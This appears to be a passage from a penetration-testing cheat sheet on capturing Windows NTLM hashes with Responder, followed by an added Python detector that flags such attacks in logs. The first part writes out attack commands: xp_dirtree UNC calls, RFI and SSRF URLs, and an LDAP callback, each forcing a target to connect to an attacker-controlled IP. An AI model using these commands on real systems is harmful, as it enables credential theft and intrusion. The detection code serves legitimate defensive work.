Kali> sudo responder -I tun0 -v

# Database with mssqlclient.py
SQL> EXEC sp_helprotect 'xp_dirtree'
SQL> master.sys.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP

# Database with sqsh
1> use master;
2> EXEC sp_helprotect 'xp_dirtree';
3> go
1> exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'   # Kali IP
2> go
Theft via HTTP
# Find an RFI vulnerability, then use it to access a resource back on Kali
Kali> sudo responder -I tun0
Browser> http://school.flight.htb/index.php?view=//<KaliIP>/any/thing.txt

# Another example
Kali> sudo responder -I tun0 -v
Kali> curl "http://192.168.206.165:8080/?url=http://192.168.49.206"
Theft via LDAP
Kali> sudo responder -I tun0

# Target Windows OS
# Access LDAP, triggering a connection back to Kali
# ldap://<Kali IP>:389
Target system or service> ldap://10.10.14.114:389
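
Each technique above makes the target open an SMB, HTTP or LDAP connection to a host outside its normal set, so the reference to that host can be spotted in SQL audit, web access and configuration logs where those are collected. The following is an added example, not part of the original cheat sheet, that flags such references; the allow-list, the log line formats and the function names are assumptions, and xp_fileexist and xp_subdirs go beyond the xp_dirtree case shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hosts that servers on this network may legitimately reference.
ALLOWED_HOSTS = {"fileserver01.corp.example", "dc01.corp.example"}

# xp_dirtree is the procedure on this page; xp_fileexist and xp_subdirs are
# included because they also take a path argument.
SQL_UNC = re.compile(r"xp_(?:dirtree|fileexist|subdirs)\b[^']*'\\\\([^\\']+)", re.I)
LDAP_URL = re.compile(r"\bldaps?://([^/:\s']+)", re.I)
# Parameter value that starts with //host, \\host or scheme://host.
REMOTE_REF = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?(?://|\\\\)([^/\\:?#]+)", re.I)

def classify(line):
    """Return (reason, host) for the first non-allow-listed remote reference, else None."""
    found = [("sql-unc-path", h) for h in SQL_UNC.findall(line)]
    found += [("ldap-url", h) for h in LDAP_URL.findall(line)]
    for token in line.split():
        if "?" not in token:
            continue
        try:
            query = urlsplit(token).query
        except ValueError:  # malformed URL token, nothing to parse
            continue
        # parse_qsl percent-decodes, so %2F%2Fhost and %5C%5Chost are caught too
        for _, value in parse_qsl(query):
            m = REMOTE_REF.match(value)
            if m:
                found.append(("http-param-remote-ref", m.group(1)))
    for reason, host in found:
        if host.lower() not in ALLOWED_HOSTS:
            return reason, host.lower()
    return None

# Constructed sample lines (SQL audit, web access log, config audit); not real logs.
SAMPLE = [
    r"sql-audit user=web stmt=exec master.dbo.xp_dirtree '\\10.10.14.54\any\thing'",
    r"sql-audit user=etl stmt=exec master.dbo.xp_dirtree '\\fileserver01.corp.example\in'",
    "GET /index.php?view=//10.10.14.54/any/thing.txt HTTP/1.1",
    "GET /index.php?view=%5C%5C10.10.14.54%5Cany HTTP/1.1",
    "GET /?url=http://192.168.49.206 HTTP/1.1",
    "GET /index.php?view=home.html HTTP/1.1",
    "config-audit field=directory_server value=ldap://10.10.14.114:389",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "<-", line)
```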